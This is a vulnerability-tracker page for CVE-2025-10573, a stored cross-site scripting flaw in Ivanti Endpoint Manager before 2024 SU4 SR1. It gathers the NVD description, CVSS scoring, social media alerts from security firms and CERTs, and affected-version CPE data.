AI description
CVE-2025-10573 is a stored cross-site scripting (XSS) vulnerability found in Ivanti Endpoint Manager (EPM) versions prior to 2024 SU4 SR1. It stems from improper neutralization of user-supplied input during web page generation. An attacker with unauthenticated access to the primary EPM web service can inject malicious JavaScript code into the administrator web dashboard by joining fake managed endpoints to the EPM server. When an Ivanti EPM administrator views a poisoned dashboard interface, the malicious JavaScript code is executed, potentially allowing the attacker to gain control of the administrator's session. User interaction is required to trigger the XSS. Ivanti has released EPM version EPM 2024 SU4 SR1 to address this vulnerability.
- Description
- Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
- Source
- 3c1d8aa1-5a33-4ea4-8992-aadd6440af75
- NVD status
- Analyzed
- Products
- endpoint_manager
CVSS 3.1
- Type
- Primary
- Base score
- 6.1
- Impact score
- 2.7
- Exploitability score
- 2.8
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Severity
- MEDIUM
- 3c1d8aa1-5a33-4ea4-8992-aadd6440af75
- CWE-79
- Hype score
- Not currently trending
🚨 Ivanti Endpoint Manager [—] Dec 19, 2025 Critical vulnerabilities and security advisory for Ivanti Endpoint Manager, including CVE-2025-10573 and related remote code execution risks. Checkout our Threat Intelligence Platform: https://t.co/QuwNtEhw6z... https://t.co/T18FWuk
@transilienceai
19 Dec 2025
4 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 แจ้งเตือนช่องโหว่วิกฤต Ivanti Endpoint Manager (EPM) – CVE-2025-10573 ThaiCERT ตรวจพบรายงานช่องโหว่ความรุนแรงระดับวิกฤต หมายเลข CVE-202
@ThaiCERTByNCSA
15 Dec 2025
49 Impressions
1 Retweet
0 Likes
0 Bookmarks
0 Replies
0 Quotes
CVE-2025-10573 Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an admi… https://t.co/Offkbsj1tT
@CVEnew
14 Dec 2025
227 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 CVE-2025-10573 | Ivanti Endpoint Manager Critical stored XSS (CVSS 9.6) → unauth JS in admin sessions. 🔧 Fixed in Ivanti EPM 2024 SU4 SR1 (Dec 9) 📊 Censys sees 1,898 exposed EPM instances, 80 vulnerable ➡️ Upgrade immediately. 🔗https://t.co/4EyNonmMaM #CVE2
@censysio
12 Dec 2025
5862 Impressions
20 Retweets
72 Likes
29 Bookmarks
6 Replies
0 Quotes
🔴 CVE-2025-10573: Ivanti EPM Stored XSS Hijacks Admin Sessions Ivanti Endpoint Manager has critical stored XSS (CVSS 9.0) that escalates to full admin takeover. What's clever: attackers inject malicious scripts into EPM's web interface that execute when administrators view
@the_c_protocol
11 Dec 2025
52 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti EPM XSS nightmare (CVE-2025-10573): Unauth attackers drop JS bombs for code exec. Fortinet's duo of auth bypasses (FortiOS et al.) join the party. SAP's 14 vulns too—patch parade! https://t.co/4SUomvqmXw #Ivanti #Fortinet #SAPSecurity
@ImperialTechSvc
11 Dec 2025
41 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
X crew, threats don't take holidays. Today's drop: Microsoft's mega Patch Tuesday slams 56 flaws (1 zero-day exploited!), ransomware exploding on hypervisors (+700%), and a sneaky new CastleLoader malware variant slinging Python payloads. Plus, Ivanti's XSS bomb (CVE-2025-10573)
@ImperialTechSvc
11 Dec 2025
35 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti warns of critical code execution flaw in Endpoint Manager https://t.co/v3sYbERyk9 #Cross-siteScripting #cve-2025-10573 #RemoteCodeExecution
@wizconsults
10 Dec 2025
43 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti releases patches for critical Endpoint Manager flaw CVE-2025-10573 allowing remote unauthenticated JavaScript code execution in admin sessions. PoC exploit reported, updates urged. #Vulnerability https://t.co/GqJMv8I5Rn
@threatcluster
10 Dec 2025
50 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Upozorňujeme na kritickou zranitelnost v Ivanti Endpoint Manager (EPM), CVE-2025-10573. Jedná se o chybu typu Stored XSS, která umožňuje vzdálenému neautentizovanému útočníkovi vložit škodlivý JavaScript do administrátorského rozhraní prostřednictvím fale
@GOVCERT_CZ
10 Dec 2025
598 Impressions
0 Retweets
3 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti EPM suffers stored XSS (CVE-2025-10573, CVSS 9.6) enabling remote code execution - patch now and check UI sanitization. https://t.co/eACfm4FS7t #infosec #Ivanti
@_UncleHacker_
10 Dec 2025
16 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Security Bulletin: Ivanti EPM (CVE-2025-10573, CVSS 9.6) contains a stored XSS flaw that runs attacker scripts when admins load compromised fields. Patch to 2024 SU4 SR1 now. #ThreatIntel #RedLeggCTI https://t.co/ArD4i6n8du
@RedLegg
9 Dec 2025
81 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Earlier this year, Rapid7 researchers discovered a stored cross-site scripting (XSS) vuln. in #Ivanti Endpoint Manager (EPM) – affecting versions 2024 SU4 and below. Now patched, CVE-2025-10573 has been assigned a CVSS score of 9.6. More in our blog: https://t.co/FtdADlLL
@rapid7
9 Dec 2025
9141 Impressions
22 Retweets
50 Likes
18 Bookmarks
2 Replies
0 Quotes
[CVE-2025-10573: CRITICAL] Critical stored XSS vulnerability in Ivanti Endpoint Manager (pre-2024 SU4 SR1) lets remote attacker run malicious JavaScript in admin session. User interaction needed.#cve,CVE-2025-10573,#cybersecurity https://t.co/lKnf20YeQn https://t.co/4JKsBO3PDE
@CveFindCom
9 Dec 2025
106 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
[
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7ABDE6FE-56CC-4A46-91F2-2F54C3EC6A75",
"versionEndExcluding": "2024",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*",
"matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*",
"matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*",
"matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*",
"matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*",
"matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*",
"matchCriteriaId": "4902A745-E7CB-4FC9-9BCB-89EFAB643237",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
]